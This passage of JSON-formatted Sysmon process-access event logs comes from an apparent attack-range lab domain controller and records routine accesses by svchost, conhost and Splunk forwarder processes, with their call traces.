05:49:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3987,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:54.168\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:54.168","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3988,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:54.168\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:54.168","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3989,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:54.168\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:54.168","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3990,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:54.168\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:54.168","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3991,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:54.168\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:54.168","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3992,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:54.168\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:54.168","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3993,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:54.168\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:54.168","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3994,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:54.168\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0282-5F25-0000-0010B1F20500}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:54.168","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0282-5F25-0000-0010B1F20500}","TargetProcessId":"3776","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3995,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:54.309\r\nSourceProcessGUID: {A837DB8D-0282-5F25-0000-0010B1F20500}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3396\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program 